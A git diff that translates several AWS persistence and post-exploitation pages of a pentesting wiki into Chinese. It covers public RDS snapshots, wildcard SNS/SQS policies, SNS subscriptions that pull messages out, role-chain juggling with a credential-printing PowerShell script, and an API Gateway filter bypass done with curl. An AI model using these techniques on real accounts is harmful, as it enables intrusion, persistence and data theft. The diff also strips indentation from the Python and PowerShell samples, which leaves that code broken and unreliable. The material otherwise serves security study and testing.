-If domains are configured:
+如果域名已配置:
-- Create a subdomain pointing your IP so you will have a **subdomain takeover**
-- Create **SPF** record allowing you to send **emails** from the domain
-- Configure the **main domain IP to your own one** and perform a **MitM** from your IP to the legit ones
+- 创建一个指向您的 IP 的子域,以便您将拥有 **子域接管**
+- 创建 **SPF** 记录,允许您从该域发送 **电子邮件**
+- 将 **主域 IP 配置为您自己的 IP**,并从您的 IP 对合法 IP 执行 **MitM**
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
index b7a4b8f7b..0d3859920 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md
@@ -1,35 +1,27 @@
-# AWS - RDS Persistence
+# AWS - RDS 持久性
{{#include ../../../banners/hacktricks-training.md}}
## RDS
-For more information check:
+有关更多信息,请查看:
{{#ref}}
../aws-services/aws-relational-database-rds-enum.md
{{#endref}}
-### Make instance publicly accessible: `rds:ModifyDBInstance`
-
-An attacker with this permission can **modify an existing RDS instance to enable public accessibility**.
+### 使实例公开可访问:`rds:ModifyDBInstance`
+具有此权限的攻击者可以**修改现有的 RDS 实例以启用公共可访问性**。
```bash
aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately
```
+### 在数据库中创建管理员用户
-### Create an admin user inside the DB
-
-An attacker could just **create a user inside the DB** so even if the master users password is modified he **doesn't lose the access** to the database.
-
-### Make snapshot public
+攻击者可以**在数据库中创建一个用户**,即使主用户的密码被修改,他也**不会失去对数据库的访问**。
+### 使快照公开
```bash
aws rds modify-db-snapshot-attribute --db-snapshot-identifier --attribute-name restore --values-to-add all
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
index f2c4ce048..2eb434759 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md
@@ -1,29 +1,25 @@
-# AWS - S3 Persistence
+# AWS - S3 持久性
{{#include ../../../banners/hacktricks-training.md}}
## S3
-For more information check:
+有关更多信息,请查看:
{{#ref}}
../aws-services/aws-s3-athena-and-glacier-enum.md
{{#endref}}
-### KMS Client-Side Encryption
+### KMS 客户端加密
-When the encryption process is done the user will use the KMS API to generate a new key (`aws kms generate-data-key`) and he will **store the generated encrypted key inside the metadata** of the file ([python code example](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) so when the decrypting occur it can decrypt it using KMS again:
+当加密过程完成后,用户将使用 KMS API 生成一个新密钥(`aws kms generate-data-key`),并将**生成的加密密钥存储在文件的元数据中**([python 代码示例](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)),以便在解密时可以再次使用 KMS 进行解密:
-Therefore, and attacker could get this key from the metadata and decrypt with KMS (`aws kms decrypt`) to obtain the key used to encrypt the information. This way the attacker will have the encryption key and if that key is reused to encrypt other files he will be able to use it.
+因此,攻击者可以从元数据中获取此密钥,并使用 KMS(`aws kms decrypt`)进行解密,以获得用于加密信息的密钥。这样,攻击者将拥有加密密钥,如果该密钥被重用于加密其他文件,他将能够使用它。
-### Using S3 ACLs
+### 使用 S3 ACLs
-Although usually ACLs of buckets are disabled, an attacker with enough privileges could abuse them (if enabled or if the attacker can enable them) to keep access to the S3 bucket.
+尽管通常存储桶的 ACL 被禁用,但具有足够权限的攻击者可以滥用它们(如果启用或攻击者可以启用它们)以保持对 S3 存储桶的访问。
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md
index c15f27003..7dc60a195 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md
@@ -4,54 +4,48 @@
## Secrets Manager
-For more info check:
+有关更多信息,请查看:
{{#ref}}
../aws-services/aws-secrets-manager-enum.md
{{#endref}}
-### Via Resource Policies
+### 通过资源策略
-It's possible to **grant access to secrets to external accounts** via resource policies. Check the [**Secrets Manager Privesc page**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) for more information. Note that to **access a secret**, the external account will also **need access to the KMS key encrypting the secret**.
+可以通过资源策略**授予外部账户对秘密的访问权限**。有关更多信息,请查看[**Secrets Manager Privesc 页面**](../aws-privilege-escalation/aws-secrets-manager-privesc.md)。请注意,要**访问一个秘密**,外部账户还**需要访问加密该秘密的 KMS 密钥**。
-### Via Secrets Rotate Lambda
+### 通过 Secrets Rotate Lambda
-To **rotate secrets** automatically a configured **Lambda** is called. If an attacker could **change** the **code** he could directly **exfiltrate the new secret** to himself.
-
-This is how lambda code for such action could look like:
+要**自动旋转秘密**,会调用一个配置好的**Lambda**。如果攻击者能够**更改**该**代码**,他可以直接**将新秘密导出**给自己。
+这就是此类操作的 Lambda 代码可能的样子:
```python
import boto3
def rotate_secrets(event, context):
- # Create a Secrets Manager client
- client = boto3.client('secretsmanager')
+# Create a Secrets Manager client
+client = boto3.client('secretsmanager')
- # Retrieve the current secret value
- secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString']
+# Retrieve the current secret value
+secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString']
- # Rotate the secret by updating its value
- new_secret_value = rotate_secret(secret_value)
- client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value)
+# Rotate the secret by updating its value
+new_secret_value = rotate_secret(secret_value)
+client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value)
def rotate_secret(secret_value):
- # Perform the rotation logic here, e.g., generate a new password
+# Perform the rotation logic here, e.g., generate a new password
- # Example: Generate a new password
- new_secret_value = generate_password()
+# Example: Generate a new password
+new_secret_value = generate_password()
- return new_secret_value
+return new_secret_value
def generate_password():
- # Example: Generate a random password using the secrets module
- import secrets
- import string
- password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16))
- return password
+# Example: Generate a random password using the secrets module
+import secrets
+import string
+password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16))
+return password
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md
index 8e97cc81c..c8cb805d5 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md
@@ -1,85 +1,77 @@
-# AWS - SNS Persistence
+# AWS - SNS 持久性
{{#include ../../../banners/hacktricks-training.md}}
## SNS
-For more information check:
+有关更多信息,请查看:
{{#ref}}
../aws-services/aws-sns-enum.md
{{#endref}}
-### Persistence
-
-When creating a **SNS topic** you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\
-The following policy gives everyone in AWS access to read and write in the SNS topic called **`MySNS.fifo`**:
+### 持久性
+创建 **SNS 主题** 时,您需要通过 IAM 策略指明 **谁有权读取和写入**。可以指明外部账户、角色的 ARN,或 **甚至 "\*"**。\
+以下策略允许 AWS 中的每个人访问名为 **`MySNS.fifo`** 的 SNS 主题进行读取和写入:
```json
{
- "Version": "2008-10-17",
- "Id": "__default_policy_ID",
- "Statement": [
- {
- "Sid": "__default_statement_ID",
- "Effect": "Allow",
- "Principal": {
- "AWS": "*"
- },
- "Action": [
- "SNS:Publish",
- "SNS:RemovePermission",
- "SNS:SetTopicAttributes",
- "SNS:DeleteTopic",
- "SNS:ListSubscriptionsByTopic",
- "SNS:GetTopicAttributes",
- "SNS:AddPermission",
- "SNS:Subscribe"
- ],
- "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
- "Condition": {
- "StringEquals": {
- "AWS:SourceOwner": "318142138553"
- }
- }
- },
- {
- "Sid": "__console_pub_0",
- "Effect": "Allow",
- "Principal": {
- "AWS": "*"
- },
- "Action": "SNS:Publish",
- "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
- },
- {
- "Sid": "__console_sub_0",
- "Effect": "Allow",
- "Principal": {
- "AWS": "*"
- },
- "Action": "SNS:Subscribe",
- "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
- }
- ]
+"Version": "2008-10-17",
+"Id": "__default_policy_ID",
+"Statement": [
+{
+"Sid": "__default_statement_ID",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": [
+"SNS:Publish",
+"SNS:RemovePermission",
+"SNS:SetTopicAttributes",
+"SNS:DeleteTopic",
+"SNS:ListSubscriptionsByTopic",
+"SNS:GetTopicAttributes",
+"SNS:AddPermission",
+"SNS:Subscribe"
+],
+"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
+"Condition": {
+"StringEquals": {
+"AWS:SourceOwner": "318142138553"
+}
+}
+},
+{
+"Sid": "__console_pub_0",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": "SNS:Publish",
+"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
+},
+{
+"Sid": "__console_sub_0",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": "SNS:Subscribe",
+"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
+}
+]
}
```
+### 创建订阅者
-### Create Subscribers
-
-To continue exfiltrating all the messages from all the topics and attacker could **create subscribers for all the topics**.
-
-Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used.
+为了继续从所有主题中提取所有消息,攻击者可以**为所有主题创建订阅者**。
+请注意,如果**主题是 FIFO 类型**,则只能使用协议**SQS**的订阅者。
```bash
aws sns subscribe --region \
- --protocol http \
- --notification-endpoint http:/// \
- --topic-arn
+--protocol http \
+--notification-endpoint http:/// \
+--topic-arn
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md
index 88f396173..98030299c 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md
@@ -1,43 +1,37 @@
-# AWS - SQS Persistence
+# AWS - SQS 持久性
{{#include ../../../banners/hacktricks-training.md}}
## SQS
-For more information check:
+有关更多信息,请查看:
{{#ref}}
../aws-services/aws-sqs-and-sns-enum.md
{{#endref}}
-### Using resource policy
-
-In SQS you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\
-The following policy gives everyone in AWS access to everything in the queue called **MyTestQueue**:
+### 使用资源策略
+在 SQS 中,您需要通过 IAM 策略指明 **谁可以访问读取和写入**。可以指明外部账户、角色的 ARN,或 **甚至 "\*"**。\
+以下策略允许 AWS 中的每个人访问名为 **MyTestQueue** 的队列中的所有内容:
```json
{
- "Version": "2008-10-17",
- "Id": "__default_policy_ID",
- "Statement": [
- {
- "Sid": "__owner_statement",
- "Effect": "Allow",
- "Principal": {
- "AWS": "*"
- },
- "Action": ["SQS:*"],
- "Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue"
- }
- ]
+"Version": "2008-10-17",
+"Id": "__default_policy_ID",
+"Statement": [
+{
+"Sid": "__owner_statement",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": ["SQS:*"],
+"Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue"
+}
+]
}
```
-
> [!NOTE]
-> You could even **trigger a Lambda in the attackers account every-time a new message** is put in the queue (you would need to re-put it) somehow. For this follow these instructinos: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html)
+> 您甚至可以**在攻击者的账户中每次有新消息**放入队列时触发一个 Lambda(您需要以某种方式重新放入它)。为此,请遵循以下说明: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html)
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md
index c1b9a422b..3bd0aae28 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md
@@ -1,6 +1 @@
# AWS - SSM Perssitence
-
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md
index 4e8c120ff..2c12e3f5e 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md
@@ -4,7 +4,7 @@
## Step Functions
-For more information check:
+有关更多信息,请查看:
{{#ref}}
../aws-services/aws-stepfunctions-enum.md
@@ -12,14 +12,10 @@ For more information check:
### Step function Backdooring
-Backdoor a step function to make it perform any persistence trick so every time it's executed it will run your malicious steps.
+对步骤函数进行后门设置,使其执行任何持久性技巧,以便每次执行时都会运行您的恶意步骤。
### Backdooring aliases
-If the AWS account is using aliases to call step functions it would be possible to modify an alias to use a new backdoored version of the step function.
+如果AWS账户使用别名来调用步骤函数,则可以修改别名以使用步骤函数的新后门版本。
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md
index 74db04bec..9ca4ad338 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md
@@ -1,65 +1,62 @@
-# AWS - STS Persistence
+# AWS - STS 持久性
{{#include ../../../banners/hacktricks-training.md}}
## STS
-For more information access:
+有关更多信息,请访问:
{{#ref}}
../aws-services/aws-sts-enum.md
{{#endref}}
-### Assume role token
+### 假设角色令牌
-Temporary tokens cannot be listed, so maintaining an active temporary token is a way to maintain persistence.
+临时令牌无法列出,因此保持活动的临时令牌是一种维持持久性的方法。
aws sts get-session-token --duration-seconds 129600
-# With MFA
+# 使用 MFA
aws sts get-session-token \
- --serial-number <mfa-device-name> \
- --token-code <code-from-token>
+--serial-number <mfa-device-name> \
+--token-code <code-from-token>
-# Hardware device name is usually the number from the back of the device, such as GAHT12345678
-# SMS device name is the ARN in AWS, such as arn:aws:iam::123456789012:sms-mfa/username
-# Vritual device name is the ARN in AWS, such as arn:aws:iam::123456789012:mfa/username
+# 硬件设备名称通常是设备背面的数字,例如 GAHT12345678
+# 短信设备名称是 AWS 中的 ARN,例如 arn:aws:iam::123456789012:sms-mfa/username
+# 虚拟设备名称是 AWS 中的 ARN,例如 arn:aws:iam::123456789012:mfa/username
-### Role Chain Juggling
+### 角色链切换
-[**Role chaining is an acknowledged AWS feature**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_terms-and-concepts.html#Role%20chaining), often utilized for maintaining stealth persistence. It involves the ability to **assume a role which then assumes another**, potentially reverting to the initial role in a **cyclical manner**. Each time a role is assumed, the credentials' expiration field is refreshed. Consequently, if two roles are configured to mutually assume each other, this setup allows for the perpetual renewal of credentials.
-
-You can use this [**tool**](https://github.com/hotnops/AWSRoleJuggler/) to keep the role chaining going:
+[**角色链切换是一个被认可的 AWS 特性**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_terms-and-concepts.html#Role%20chaining),通常用于保持隐蔽的持久性。它涉及能够 **假设一个角色,然后假设另一个角色**,可能以 **循环的方式** 还原到初始角色。每次假设角色时,凭证的过期字段都会刷新。因此,如果两个角色被配置为相互假设,这种设置允许凭证的永久更新。
+您可以使用这个 [**工具**](https://github.com/hotnops/AWSRoleJuggler/) 来保持角色链切换:
```bash
./aws_role_juggler.py -h
usage: aws_role_juggler.py [-h] [-r ROLE_LIST [ROLE_LIST ...]]
optional arguments:
- -h, --help show this help message and exit
- -r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...]
+-h, --help show this help message and exit
+-r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...]
```
-
> [!CAUTION]
-> Note that the [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) script from that Github repository doesn't find all the ways a role chain can be configured.
+> 请注意,来自该Github存储库的 [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) 脚本并不能找到角色链配置的所有方式。
-Code to perform Role Juggling from PowerShell
-
+从PowerShell执行角色切换的代码
```powershell
# PowerShell script to check for role juggling possibilities using AWS CLI
# Check for AWS CLI installation
if (-not (Get-Command "aws" -ErrorAction SilentlyContinue)) {
- Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'."
- exit
+Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'."
+exit
}
# Function to list IAM roles
function List-IAMRoles {
- aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json
+aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json
}
# Initialize error count
@@ -70,66 +67,61 @@ $roles = List-IAMRoles | ConvertFrom-Json
# Attempt to assume each role
foreach ($role in $roles) {
- $sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
- try {
- $credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
- if ($credentials) {
- Write-Host "Successfully assumed role: $($role.RoleName)"
- Write-Host "Access Key: $($credentials.AccessKeyId)"
- Write-Host "Secret Access Key: $($credentials.SecretAccessKey)"
- Write-Host "Session Token: $($credentials.SessionToken)"
- Write-Host "Expiration: $($credentials.Expiration)"
+$sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
+try {
+$credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
+if ($credentials) {
+Write-Host "Successfully assumed role: $($role.RoleName)"
+Write-Host "Access Key: $($credentials.AccessKeyId)"
+Write-Host "Secret Access Key: $($credentials.SecretAccessKey)"
+Write-Host "Session Token: $($credentials.SessionToken)"
+Write-Host "Expiration: $($credentials.Expiration)"
- # Set temporary credentials to assume the next role
- $env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId
- $env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey
- $env:AWS_SESSION_TOKEN = $credentials.SessionToken
+# Set temporary credentials to assume the next role
+$env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId
+$env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey
+$env:AWS_SESSION_TOKEN = $credentials.SessionToken
- # Try to assume another role using the temporary credentials
- foreach ($nextRole in $roles) {
- if ($nextRole.Arn -ne $role.Arn) {
- $nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
- try {
- $nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
- if ($nextCredentials) {
- Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)"
- Write-Host "Access Key: $($nextCredentials.AccessKeyId)"
- Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)"
- Write-Host "Session Token: $($nextCredentials.SessionToken)"
- Write-Host "Expiration: $($nextCredentials.Expiration)"
- }
- } catch {
- $errorCount++
- }
- }
- }
+# Try to assume another role using the temporary credentials
+foreach ($nextRole in $roles) {
+if ($nextRole.Arn -ne $role.Arn) {
+$nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
+try {
+$nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
+if ($nextCredentials) {
+Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)"
+Write-Host "Access Key: $($nextCredentials.AccessKeyId)"
+Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)"
+Write-Host "Session Token: $($nextCredentials.SessionToken)"
+Write-Host "Expiration: $($nextCredentials.Expiration)"
+}
+} catch {
+$errorCount++
+}
+}
+}
- # Reset environment variables
- Remove-Item Env:\AWS_ACCESS_KEY_ID
- Remove-Item Env:\AWS_SECRET_ACCESS_KEY
- Remove-Item Env:\AWS_SESSION_TOKEN
- } else {
- $errorCount++
- }
- } catch {
- $errorCount++
- }
+# Reset environment variables
+Remove-Item Env:\AWS_ACCESS_KEY_ID
+Remove-Item Env:\AWS_SECRET_ACCESS_KEY
+Remove-Item Env:\AWS_SESSION_TOKEN
+} else {
+$errorCount++
+}
+} catch {
+$errorCount++
+}
}
# Output the number of errors if any
if ($errorCount -gt 0) {
- Write-Host "$errorCount error(s) occurred during role assumption attempts."
+Write-Host "$errorCount error(s) occurred during role assumption attempts."
} else {
- Write-Host "No errors occurred. All roles checked successfully."
+Write-Host "No errors occurred. All roles checked successfully."
}
Write-Host "Role juggling check complete."
```
-
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md
index 53f79d916..c692338a4 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md
@@ -1,6 +1 @@
-# AWS - Post Exploitation
-
-
-
-
-
+# AWS - 后期利用
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md
index 4847c40e0..96829e503 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md
@@ -4,48 +4,43 @@
## API Gateway
-For more information check:
+有关更多信息,请查看:
{{#ref}}
../aws-services/aws-api-gateway-enum.md
{{#endref}}
-### Access unexposed APIs
+### 访问未公开的 API
-You can create an endpoint in [https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint](https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#CreateVpcEndpoint:) with the service `com.amazonaws.us-east-1.execute-api`, expose the endpoint in a network where you have access (potentially via an EC2 machine) and assign a security group allowing all connections.\
-Then, from the EC2 machine you will be able to access the endpoint and therefore call the gateway API that wasn't exposed before.
+您可以在 [https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint](https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#CreateVpcEndpoint:) 创建一个服务为 `com.amazonaws.us-east-1.execute-api` 的端点,将该端点暴露在您可以访问的网络中(可能通过 EC2 机器),并分配一个允许所有连接的安全组。\
+然后,从 EC2 机器上,您将能够访问该端点,从而调用之前未公开的网关 API。
-### Bypass Request body passthrough
+### 绕过请求体传递
-This technique was found in [**this CTF writeup**](https://blog-tyage-net.translate.goog/post/2023/2023-09-03-midnightsun/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=en&_x_tr_pto=wapp).
+此技术在 [**此 CTF 文章**](https://blog-tyage-net.translate.goog/post/2023/2023-09-03-midnightsun/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=en&_x_tr_pto=wapp) 中发现。
-As indicated in the [**AWS documentation**](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-method-integration.html) in the `PassthroughBehavior` section, by default, the value **`WHEN_NO_MATCH`** , when checking the **Content-Type** header of the request, will pass the request to the back end with no transformation.
-
-Therefore, in the CTF the API Gateway had an integration template that was **preventing the flag from being exfiltrated** in a response when a request was sent with `Content-Type: application/json`:
+正如 [**AWS 文档**](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-method-integration.html) 中的 `PassthroughBehavior` 部分所示,默认情况下,值 **`WHEN_NO_MATCH`** 在检查请求的 **Content-Type** 头时,将请求传递给后端而不进行任何转换。
+因此,在 CTF 中,API Gateway 有一个集成模板,该模板 **阻止了标志在响应中被外泄**,当请求以 `Content-Type: application/json` 发送时:
```yaml
RequestTemplates:
- application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'
+application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'
```
+然而,发送一个带有 **`Content-type: text/json`** 的请求将会阻止该过滤器。
-However, sending a request with **`Content-type: text/json`** would prevent that filter.
-
-Finally, as the API Gateway was only allowing `Get` and `Options`, it was possible to send an arbitrary dynamoDB query without any limit sending a POST request with the query in the body and using the header `X-HTTP-Method-Override: GET`:
-
+最后,由于 API Gateway 仅允许 `Get` 和 `Options`,因此可以通过发送一个带有查询的 POST 请求,并使用头部 `X-HTTP-Method-Override: GET` 来发送任意的 dynamoDB 查询,而没有任何限制:
```bash
curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json' --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}'
```
+### 使用计划 DoS
-### Usage Plans DoS
+在 **Enumeration** 部分,您可以看到如何 **获取密钥的使用计划**。如果您拥有密钥并且它的 **每月使用次数限制为 X**,您可以 **直接使用它并造成 DoS**。
-In the **Enumeration** section you can see how to **obtain the usage plan** of the keys. If you have the key and it's **limited** to X usages **per month**, you could **just use it and cause a DoS**.
-
-The **API Key** just need to be **included** inside a **HTTP header** called **`x-api-key`**.
+**API Key** 只需包含在一个名为 **`x-api-key`** 的 **HTTP 头** 中。
### `apigateway:UpdateGatewayResponse`, `apigateway:CreateDeployment`
-An attacker with the permissions `apigateway:UpdateGatewayResponse` and `apigateway:CreateDeployment` can **modify an existing Gateway Response to include custom headers or response templates that leak sensitive information or execute malicious scripts**.
-
+拥有权限 `apigateway:UpdateGatewayResponse` 和 `apigateway:CreateDeployment` 的攻击者可以 **修改现有的 Gateway Response,以包含自定义头或响应模板,这些模板泄露敏感信息或执行恶意脚本**。
```bash
API_ID="your-api-id"
RESPONSE_TYPE="DEFAULT_4XX"
@@ -56,16 +51,14 @@ aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RE
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
```
-
-**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources.
+**潜在影响**:敏感信息泄露、执行恶意脚本或未经授权访问API资源。
> [!NOTE]
-> Need testing
+> 需要测试
### `apigateway:UpdateStage`, `apigateway:CreateDeployment`
-An attacker with the permissions `apigateway:UpdateStage` and `apigateway:CreateDeployment` can **modify an existing API Gateway stage to redirect traffic to a different stage or change the caching settings to gain unauthorized access to cached data**.
-
+拥有权限 `apigateway:UpdateStage` 和 `apigateway:CreateDeployment` 的攻击者可以 **修改现有的API Gateway阶段,将流量重定向到不同的阶段或更改缓存设置以获得对缓存数据的未经授权访问**。
```bash
API_ID="your-api-id"
STAGE_NAME="Prod"
@@ -76,16 +69,14 @@ aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --pat
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
```
-
-**Potential Impact**: Unauthorized access to cached data, disrupting or intercepting API traffic.
+**潜在影响**:未经授权访问缓存数据,干扰或拦截API流量。
> [!NOTE]
-> Need testing
+> 需要测试
### `apigateway:PutMethodResponse`, `apigateway:CreateDeployment`
-An attacker with the permissions `apigateway:PutMethodResponse` and `apigateway:CreateDeployment` can **modify the method response of an existing API Gateway REST API method to include custom headers or response templates that leak sensitive information or execute malicious scripts**.
-
+拥有权限 `apigateway:PutMethodResponse` 和 `apigateway:CreateDeployment` 的攻击者可以**修改现有API Gateway REST API方法的响应,以包含自定义头或响应模板,这些头或模板泄露敏感信息或执行恶意脚本**。
```bash
API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
@@ -98,16 +89,14 @@ aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE
# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
```
-
-**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources.
